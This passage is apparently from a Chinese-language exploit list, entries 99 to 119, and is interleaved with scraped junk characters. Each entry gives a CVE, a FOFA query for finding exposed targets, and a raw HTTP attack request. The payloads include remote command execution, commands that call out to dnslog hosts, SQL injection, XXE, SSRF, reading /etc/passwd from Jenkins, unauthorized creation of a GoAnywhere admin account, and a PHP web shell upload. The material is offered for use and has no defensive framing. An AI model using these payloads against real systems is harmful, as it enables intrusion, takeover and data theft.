& Y6 d, T& J2 b) O0 G! X4 WContent-Length: 1215 g. B7 T0 ~; r& V% ]$ u
Accept: */*! D- d8 X6 N7 d6 e X |) _. `$ i
Accept-Encoding: gzip, deflate) _; U1 e. @4 ?) K9 W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! c: x! i2 b+ D) yContent-Type: application/x-www-form-urlencoded; charset=UTF-89 D% F- N- i5 i7 j3 }
X-Requested-With: XMLHttpRequest4 e/ ~0 A$ [1 a6 ^) c
- Q# Z1 g2 c5 T% A& B0 a$ @6 ]id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B2 X# g* c q) _2 n4 i, o* k
[$ y8 X0 W7 w
6 u) Y9 B0 h' H7 D# @- h/ A99. Ncast盈可视高清智能录播系统busiFacade RCE
5 `5 A: {6 ]" G5 \CVE-2024-0305
8 u8 X% y7 X4 e p( @6 h. _3 { gFOFA:app="Ncast-产品" && title=="高清智能录播系统"
* i6 m5 e# W' v$ y8 U% F3 c" YPOST /classes/common/busiFacade.php HTTP/1.1
& [& v. ~8 K" g& u0 ^Host: 192.168.40.130:80801 y9 f! a1 B+ o$ t5 F1 K Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! H1 C& {& @1 u+ W( g5 ]2 ?" B
Connection: close8 c7 h L+ T- D
Content-Length: 154
# i) _6 h0 m, H- r7 s: }$ q9 n- ?Accept: */*5 I& J- E) U" O, G, h0 ]+ ?
Accept-Encoding: gzip, deflate
5 E3 {1 K, a3 R' z. M( c: ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 S2 P& ~! w4 _/ k; d. h% p" p* I! u) jContent-Type: application/x-www-form-urlencoded; charset=UTF-8
( t' I8 O& V i$ t" kX-Requested-With: XMLHttpRequest
2 ^- N' h# g2 m( i) R) I
7 Q( A) _! e3 y5 `) ?- R) i%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D. \( s1 c; r- |9 X
9 @7 h# O. ?( u: u( D
7 _- ] G3 ]- O100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传, K$ y/ `/ J- N7 z
CVE-2024-0352. E0 _9 `' \7 l& i
FOFA:icon_hash="874152924" _$ l3 v2 P. ] F2 z& c
POST /api/file/formimage HTTP/1.1
) b1 g) i( k1 l) x9 mHost: 192.168.40.130
, l4 X% v5 z: n( P3 JUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36$ K R/ i7 [1 m; A r7 Q( u
Connection: close
% f8 F1 f$ c- i3 p( wContent-Length: 201
, Q- t/ R. b* [; N! }( T [7 AContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei3 T' r( f9 v. x- A' Q# G" _
Accept-Encoding: gzip
. w( z& r6 G1 D; U& l) l) E8 B! z2 P9 ~
------WebKitFormBoundarygcflwtei1 l N ^+ x) \! e
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
! V) t: R' h$ o- wContent-Type: application/x-php* f' Y( V% G( j# o- L( g: V Y! h
. i% G' I+ P. U* P, f" r
2ayyhRXiAsKXL8olvF5s4qqyI2O6 K7 n, F! x! c2 S3 t4 z$ W
------WebKitFormBoundarygcflwtei--0 K, U1 E) j; D4 V# a
! I/ _: \" x4 Y" q0 e+ P& S6 L& C) [4 n' J' H% v
101. ivanti policy secure-22.6命令注入
; e$ C$ u8 o5 y! ^CVE-2024-21887
7 q% ` t& Q8 Q/ S3 NFOFA:body="welcome.cgi?p=logo"; q P" p6 E/ U7 h+ n0 T, G
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
7 Y: C$ }0 [6 mHost: x.x.x.xx.x.x.x6 [) D' G7 @! ]3 h [. H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ w$ R3 _4 N- wConnection: close0 y _1 x; P6 z3 p9 \
Accept-Encoding: gzip
! K, P) w- n: B2 G) q
# n% K! d+ R6 B! D" |' @1 V" n" O4 f# N# q& `# |. j% o; o
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行 @/ k( J- j* `$ F& h' L
CVE-2024-21893
! Z R0 h/ E9 WFOFA:body="welcome.cgi?p=logo"- P; @ G# Z& y0 }
POST /dana-ws/saml20.ws HTTP/1.10 x3 |' b& E- E3 F
Host: x.x.x.x- Y9 H. h {7 G( Q Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 ^ `! p; H) q) i8 q8 [7 S7 M; B
Connection: close
+ r4 k& N+ l, ~3 h# } NContent-Length: 792+ V4 v9 J% T x0 O
Accept-Encoding: gzip
5 E1 `5 D- u6 \0 r& Z# A' f7 C* H
4 S0 s3 w O L5 a% c; y<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
- n: n* P! ^: d R9 w) z2 m c9 a( V. S- o" T# g
103. Ivanti Pulse Connect Secure VPN XXE- s. o* A8 i- a0 v
CVE-2024-22024
9 A( Q3 K; } i. B# }0 eFOFA:body="welcome.cgi?p=logo". c: U' i o2 O0 u2 t& x4 C
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
1 @; ?9 Q) z: h5 [8 K; ^Host: 192.168.40.130:111' e4 Q: U* I8 |0 z' z% ?* C4 J3 e
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
. f+ k8 s( a0 Q a% eConnection: close
7 y9 C1 m X: K% e/ v3 PContent-Length: 204( r' F/ e* B% H0 q
Content-Type: application/x-www-form-urlencoded
" r5 v8 z) J f5 C* wAccept-Encoding: gzip4 H# h- L9 K* S/ F# E* ^; u4 q
& |2 o3 n- c+ M6 `7 ~! c- _: P
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==8 e, u4 `% T) v/ x) W" i6 m7 V
1 D; a& ?% E4 z+ { D6 P7 T6 I+ \. M4 q6 w( {
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
& r3 |- `7 K6 ?8 e4 F<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r> L! O- b) T. x5 z# `% p
- G( d! C: F# a8 A
. ?) n: B& [! u r# _ i8 J& W
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
! H5 e' s0 n4 f/ kCVE-2024-0569
( Z/ {; e ]0 D* ]7 ]. rFOFA:title="TOTOLINK"
- z* c( E4 T' [" ePOST /cgi-bin/cstecgi.cgi HTTP/1.1
. Y, O8 v, z" vHost:192.168.0.1
4 Z& b4 l3 \& h% i3 K+ qContent-Length:41
4 a( Z' u9 N- C P5 M/ o* T4 N; N: GAccept:application/json,text/javascript,*/*;q=0.01! \9 m& T9 |- h# b7 Q% N
X-Requested-with: XMLHttpRequest
" p! p1 K7 [0 b/ {User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36( p5 U& `2 x$ w2 F7 X, x
Content-Type: application/x-www-form-urlencoded:charset=UTF-8! h& h' ?3 V3 m. X$ A
Origin: http://192.168.0.1
* r6 p: O' o) ~( _+ N- TReferer: http://192.168.0.1/advance/index.html?time=1671152380564! b3 T. _/ @8 j7 @
Accept-Encoding:gzip,deflate4 G |3 p ^8 o( m8 v- c
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7' {6 z7 _% w5 L9 }. w8 n! p
Connection:close% Q5 c2 d! q& n: k# J1 q T9 r5 o
( f& Z) }( b9 w! S6 |3 p4 F{
1 T0 l$ ^+ ?! R3 ~: J7 O$ `+ t( q Y"topicurl":"getSysStatusCfg",% E: q, o9 F& p4 A
"token":""
. T1 g; G- J v! D, I}
) X& |3 `" m- z' a# U o/ F; W& f
6 ]8 l& Q. ^+ p- _8 j5 O105. SpringBlade v3.2.0 export-user SQL 注入
) r$ o/ X9 z4 G0 A, C4 XFOFA:body="https://bladex.vip". \3 c0 k8 \7 u6 q6 J% h( q2 S
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1; n/ B2 z2 p: d7 | z1 l
4 [/ Q* u3 s8 l( [/ \5 p- i# Q0 E
106. SpringBlade dict-biz/list SQL 注入7 J# O% C0 i# O, f( p
FOFA:body="Saber 将不能正常工作"
: v) O1 ?, N; yGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
/ } ^. K+ }7 u/ k# xHost: your-ip
. C$ d7 h! w) H$ A4 }2 b8 Z: YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 a' U$ L) D1 X# ?8 wBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
+ Q, q* t& A, ]: ~Accept-Encoding: gzip, deflate' I9 s, a" ?0 T: P+ [, M' o
Accept-Language: zh-CN,zh;q=0.9( ^/ |3 ^2 ~+ t: `4 m
Connection: close! L0 k' M4 v, s
* j6 S& h1 ^' L# x
( v( i$ f. {) u107. SpringBlade tenant/list SQL 注入' D; L2 p7 F' A
FOFA:body="https://bladex.vip" _5 m0 M9 a. \% ]. O
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1) e0 `. h6 w* {* r' o- S
Host: your-ip
1 T* n9 ^* [( @/ {6 f% |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# b( l6 Y+ y: |0 R2 n4 n
Blade-Auth:替换为自己的% h9 e+ R4 u! `: m6 ?! B
Connection: close. O/ Z6 [0 d8 A
( }3 @4 n( s/ B! L+ ~
) F2 r" \! J( Z8 L' l+ H2 q' _4 |
108. D-Tale 3.9.0 SSRF
6 P) l7 ]+ n6 vCVE-2024-21642
9 w; Y" O3 d# v& hFOFA:"dtale/static/images/favicon.png"
8 w( n" i9 G4 ?/ K5 X3 z. sGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1- J9 @' K% R$ c t- e
Host: your-ip
, ?% t$ e. V nAccept: application/json, text/plain, */*% T) w- N) H* r% ]- T$ K) z- T, l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 {' [! z. S) ^! A$ j) `4 c$ F5 Y' hAccept-Encoding: gzip, deflate4 C8 f5 Z+ m* U: w' K: a
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
[" q* r$ o) I. C( n8 [$ Z4 {& k- TConnection: close
% }1 G- h9 f* u9 k* A! r* C- z6 z
( x5 V' n* o$ Q: m1 N* K. d! l
109. Jenkins CLI 任意文件读取
- E6 k8 R$ s0 p BCVE-2024-23897
4 x) \& }( L2 j; n' ^% vFOFA:header="X-Jenkins"
# L$ Y# B$ I, c+ `" CPOST /cli?remoting=false HTTP/1.1
# q& [7 H0 i1 ]6 l4 ZHost:
; ?* M; ^' {. B* MContent-type: application/octet-stream# g; q% ~% X* U6 r* R) k
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92( e( n, Z& G6 L6 g$ k, Y
Side: upload- d# K1 \" A. K1 U7 E, v3 T
Connection: keep-alive/ d. J9 N/ J4 u- B; b
Content-Length: 163# S& _9 u: Z# K- V
; P$ y" m r, _
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03': U' {) L( r5 x% o4 N. o
* ?* ^* s7 ~0 h6 C
: ^8 s0 y* p8 c# P4 B* G! H0 i/ u
POST /cli?remoting=false HTTP/1.16 c' ?0 l6 `$ W( y3 b
Host:# \; s+ ]) X$ b! {8 N+ k
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
; e ^9 W: d! ?! Udownload
' j! J7 S7 d' j% FContent-Type: application/x-www-form-urlencoded- J$ j# f6 R4 z% t4 `( V9 Y) p; i2 B
Content-Length: 0
4 W) ~. A3 C$ e& G) T# ]
5 N6 s% f6 \% m5 x2 o/ p' o
; r- p: H: E. L. n, MERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
8 S q" ?6 G8 L" | Q" V; f5 v- Djava -jar jenkins-cli.jar help5 V/ Z- A# q; G( _0 ]1 i# B
[COMMAND]
* f- K* h; j" ]. k" l vLists all the available commands or a detailed description of single command.
/ v, x' ~9 P, ]2 O COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)5 Y, l: l5 T: X, _, o, J9 ?* c0 U
/ H* H1 Q: n- j: X; r7 b" m
' K7 w* J2 |# v& D4 v+ M6 ^
110. Goanywhere MFT 未授权创建管理员* w& Q% q- T1 ^3 z7 E, e0 D1 ~
CVE-2024-02048 n5 [. `4 E1 s4 }
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"- N7 l0 h8 e- C% v
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
3 _2 }4 k5 \6 \' DHost: 192.168.40.130:8000 q. O8 L. d) u2 X6 L0 |
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
& f# l% Q; `0 ~* t% v7 aConnection: close
9 p8 z3 \* N6 [' M2 |- w2 ZAccept: */*
3 K0 `7 Y; ~) `Accept-Language: en' u2 l, p1 Y' p& N6 ]1 t
Accept-Encoding: gzip. U$ y( n! K" V! j( F9 Q: {
+ N/ @ i2 F4 ]! X D; ?2 ?! f) B, H, S* V) C+ I
111. WordPress Plugin HTML5 Video Player SQL注入( p7 u8 _& f, e2 r3 e% ^ x
CVE-2024-1061; N0 }' ?. G: z+ ^
FOFA:"wordpress" && body="html5-video-player"& Z# y' ^! o6 [( W
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1+ ~6 r& N2 H( l
Host: 192.168.40.130:112 o6 _# D$ |# ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" e* g8 a6 b7 |% ^; z
Connection: close. F: N0 O6 p$ M; W8 y) Y
Accept: */*
t& Z3 J/ S( w, Q$ T$ vAccept-Language: en
) k" T' l( X$ N4 VAccept-Encoding: gzip1 | @; n$ {# S% P4 y8 m
. `7 C, N7 W8 o- Z3 n$ d4 R2 E7 f* Z# ]1 Q: j0 u& a( e3 O
112. WordPress Plugin NotificationX SQL 注入
2 v$ O6 a; u5 q$ k, ?CVE-2024-1698
& Z) I4 ?6 `" ^" E/ J: l8 P' b1 fFOFA:body="/wp-content/plugins/notificationx"0 |. U7 s2 h/ ~2 _7 t' w
POST /wp-json/notificationx/v1/analytics HTTP/1.13 V& r; t% q; b
Host: {{Hostname}}- X; _% Z7 e/ x
Content-Type: application/json/ h+ v+ G3 Z( G C; N( f0 }! I
4 K `0 p3 F% a: L
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}" P+ B1 i2 c) w$ R" o8 A6 v. E
4 Y4 Q7 u9 G' @" o* Q2 O& E6 M; r- t( @, v) x& m5 d) S: s5 X( @' p
113. WordPress Automatic 插件任意文件下载和SSRF* q9 q2 Q: `8 \2 d+ g
CVE-2024-27954& b1 R; q) i5 }' [4 P9 x
FOFA:"/wp-content/plugins/wp-automatic"
% w: M1 K/ H0 ^; P1 |GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1/ ]( b1 z" z4 f" t0 s( V
Host: x.x.x.x
+ _3 g+ {6 j0 }; u, l1 ^User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.368 b8 j; c* m8 w
Connection: close
4 r! t1 a( s- O) J9 qAccept: */*" g2 X' A# k. U
Accept-Language: en
1 ^0 l% ~" a0 R2 C p: `' @1 z9 wAccept-Encoding: gzip2 l+ E: i2 h- h9 A1 V
. V) `6 z( v% T' }
' [! T# v( `: A- ~114. WordPress MasterStudy LMS插件 SQL注入
) L* m h+ z1 A V1 \! p* OFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"' c" ^4 V4 W T) ]7 y
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
# V8 w6 w+ L. _2 a J vHost: your-ip
! t0 t7 P4 J( ]# GUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 `$ G, C9 x# x% w# e. VAccept-Charset: utf-8
# |0 @3 D3 k, pAccept-Encoding: gzip, deflate
- @8 c5 ~ \7 q9 U! l: k! R- dConnection: close
+ `1 h8 [* l1 U' b8 `6 Q, j6 d) h- z& O
6 x4 `' D, g& P i& p
115. WordPress Bricks Builder <= 1.9.6 RCE
5 \6 e6 o4 K) aCVE-2024-25600
% V; A# A' s+ C, Z% XFOFA: body="/wp-content/themes/bricks/"4 e$ k* E- A0 B. }
第一步,获取网站的nonce值' l6 ?' \- }4 H, ~( b
GET / HTTP/1.1
0 v, S8 y, k- l* L$ L3 A* D; AHost: x.x.x.x" C, D7 d/ Q9 ~% r- C; ?
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.366 ]" V3 l" v4 |. e7 M* U; G6 [
Connection: close# G) Q# _* l+ W" x
Accept-Encoding: gzip& Q" ]6 V, H/ c
- I: y- h* f6 g
5 { P/ p0 {9 f- d; M* L6 y( A9 }
第二步替换nonce值,执行命令
8 d! l6 m9 G* ~1 fPOST /wp-json/bricks/v1/render_element HTTP/1.1, g* M$ Y! W0 q3 Y/ l. m) o8 T
Host: x.x.x.x
1 V, Q" j4 D3 {4 H, b& KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" W. x5 _& U x( Q( H
Connection: close
1 I: [" d4 X# X# [Content-Length: 356& u+ c; S: q# F1 ?9 C
Content-Type: application/json
" i5 M9 X3 I2 O& g2 W; TAccept-Encoding: gzip% I3 q6 b9 A1 |/ L; K' {6 w
: x( D/ h9 U1 S1 j. x: X{
. s" ^! B4 d* i3 q"postId": "1",1 m+ Z5 A+ B" f/ `! `
"nonce": "第一步获得的值",
, A- X0 d+ c/ b/ i) F) U3 P; U "element": {! R2 G% ]' ?0 W) a" ]& `; a
"name": "container",
0 u: [7 h O& ?5 K) \. w* I "settings": {* l1 _: j4 |6 N" C1 g1 n
"hasLoop": "true",
- X, C0 p" @+ _, Y2 ? F1 I, W "query": {" |* i. F! _: j
"useQueryEditor": true,
: d: f. `$ ~2 N3 g$ g- e "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
2 ^) l6 y V0 z7 ~ "objectType": "post"
) ~) p' f) T. H, V }3 A6 a0 B( [9 J; h1 M( N
}
) i3 B L7 U3 Y6 j* s1 q- P }3 W& k' T: W! h" ?" c( u/ ]& c
}
3 N& h0 q) Q! i8 f/ _
: W7 `9 T. y. o B8 E
. Q: _' U: L/ y7 I8 r- Z116. wordpress js-support-ticket文件上传
1 `$ y2 ?# H) U5 B1 {FOFA:body="wp-content/plugins/js-support-ticket"5 z0 k' x& t# N7 s& W$ ~: Y2 J0 C
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1: @% N" i( L9 m% B8 W
Host:! s) G$ P) T" ? J% l) _
Content-Type: multipart/form-data; boundary=--------767099171
! d& _* j" q. T2 KUser-Agent: Mozilla/5.0
/ Z$ N: Y: T& x$ Y+ N
& \3 }8 p4 v6 O0 c! F----------767099171
: j1 K1 m2 R# u. X' V) t' u: u3 tContent-Disposition: form-data; name="action"9 i6 O2 H$ p/ Y- b
configuration_saveconfiguration
/ Z* y% F. g0 ]8 X2 ~! z$ y----------767099171
3 i7 A/ |" {) \, k2 C2 H- J) ]; K7 MContent-Disposition: form-data; name="form_request"- X' I8 F; X/ }2 m$ s2 k1 [! Q, Q
jssupportticket% y: W$ w* c4 Z( g8 T% }
----------767099171
/ S7 B: V* T: d' M* pContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
+ e3 ?9 D8 }+ k$ [' X9 gContent-Type: image/png
& n5 ~6 p8 @' [; ~$ L. a- J9 g----------767099171--6 S; M' J+ X; ^* c2 F
5 d0 c0 `: U; j
- U1 O X" T! c1 C117. WordPress LayerSlider插件SQL注入: B: T. z9 v5 p
version:7.9.11 – 7.10.0$ D ~2 \; e7 B" m
FOFA:body="/wp-content/plugins/LayerSlider/", y- [0 {3 \0 _+ V6 S
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1# u; a$ E0 } G* r. E, m
Host: your-ip
) ` n: }: G. s- D1 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ q) }4 i9 K' O) _& s4 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ k3 d, U A& i* vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) o J/ B" K, }8 j7 r! Q3 M0 FAccept-Encoding: gzip, deflate, br+ T: u1 o: N. x
Connection: close, o. a. C6 i; @ Q$ C3 o
Upgrade-Insecure-Requests: 1
3 L I: b6 z' g4 V
4 e: H+ e3 ^3 l3 T3 h: Y w/ W
( ^& W4 V( }6 ~118. 北京百绰智能S210管理平台uploadfile.php任意文件上传% e" p( H, {' X( S# X+ w7 l
CVE-2024-09390 }& b& s4 b0 a6 ?3 g
FOFA:title="Smart管理平台": [# R3 e. g \& g6 e# }! }
POST /Tool/uploadfile.php? HTTP/1.1
/ {: }& W; y3 S" ]Host: 192.168.40.130:84438 X7 E7 Q; K9 s( N% [
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f80 d( Z' V5 M& A8 t5 S Z2 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
, s4 P3 l& J% `+ R) x+ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 Y: ]4 ^' m2 \$ H% BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 g/ F% F [6 @" ]$ xAccept-Encoding: gzip, deflate
6 o; K& \. z/ @; iContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887( ?2 g. o: {) O$ k2 E
Content-Length: 405
' {' K" u& [7 s) _. C0 WOrigin: https://192.168.40.130:84435 C# n; _$ s! ~8 w, s+ x
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
" G5 Y( m, L3 i. T& m, JUpgrade-Insecure-Requests: 13 G& V4 X. F8 T8 T1 ^6 [
Sec-Fetch-Dest: document3 A3 [- P+ g U: r' D
Sec-Fetch-Mode: navigate: H' s5 ^* ~' Z0 ~* \
Sec-Fetch-Site: same-origin# ?7 f' x+ D7 F
Sec-Fetch-User: ?1. f7 m9 ^ L! @6 U
Te: trailers
; ^* t1 _4 ~ M4 EConnection: close9 y. T* h* o+ p$ e/ H" }. P1 E+ I4 l
4 J" _# P4 g( Y6 y v7 a/ y) }% [
-----------------------------13979701222747646634037182887
. T1 R0 @& d; A$ c# m/ @Content-Disposition: form-data; name="file_upload"; filename="contents.php"9 r" |7 p# Y+ o8 }; o) S
Content-Type: application/octet-stream
2 D, R! ?& p5 W \* ~; a( \. S% }2 h& t- C2 ?) f& Y T
<?php
. r' `( ]' s5 D, B" ~" h# i6 V' E6 J5 _system($_POST["passwd"]);" ?# \( H, P* K& ]- O- s
?>
! J3 F2 c% Q% p8 k-----------------------------13979701222747646634037182887
$ P/ }9 N$ O( S1 g, MContent-Disposition: form-data; name="txt_path"7 y$ E' ?2 z; ~5 Q7 [" ?
1 s. M# ?7 j6 H0 X! K: q: Z N/home/src.php
) }% `7 Q/ z% J' u# E-----------------------------13979701222747646634037182887--4 T5 s) I$ e7 `0 d
! ?6 i8 |8 y$ u6 y$ i
% y2 m! K$ A7 v5 p0 b访问/home/src.php0 F: f- d+ y% r
( [: L, V, I# ]& I( @* z
119. 北京百绰智能S20后台sysmanageajax.php sql注入
- S8 h, u/ s0 _CVE-2024-12546 n& C$ S7 T/ Y& w2 G( B7 e0 S H, I
FOFA:title="Smart管理平台"
4 i; _, o/ j! d9 [) q; |7 i" i- v+ R8 i+ {先登录进入系统,默认账号密码为admin/admin
" J- y. H. `) p, N! R: KPOST /sysmanage/sysmanageajax.php HTTP/1.11# ]) t9 ^7 V9 }& P; T
Host: x.x.x.x: j7 B7 m" T" _' S
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee8 W- t$ {7 |! A; c" j+ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
; v" d* g& \( S3 j& }9 F) o, N" WAccept: */*/ m0 N4 H, e$ [. G. \; Y( q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- f' j/ [- ^- l7 m5 G4 D: FAccept-Encoding: gzip, deflate) N0 P+ v! L8 f9 s5 @7 y6 E" o
Content-Type: application/x-www-form-urlencoded;
1 x- {: w* A4 D$ R: L7 g- XContent-Length: 109$ A* H* X/ D6 H( n# A$ G
Origin: https://58.18.133.60:8443
1 V6 F {' z3 u. n3 FReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
/ J( H- L0 [/ S+ Y* nSec-Fetch-Dest: empty3 E6 D% h# U2 ]9 G- f5 K8 _! P
Sec-Fetch-Mode: cors
% g8 J5 v- b: C5 j5 eSec-Fetch-Site: same-origin4 x% p* T. @% f2 ~1 K' X/ b
X-Forwarded-For: 1.1.1.1
9 h) w G1 y% p& t [9 w7 O( a" ^X-Originating-Ip: 1.1.1.1- Z) ~ n) r: U
X-Remote-Ip: 1.1.1.1. H2 i3 `7 g; y1 [+ C' N' j
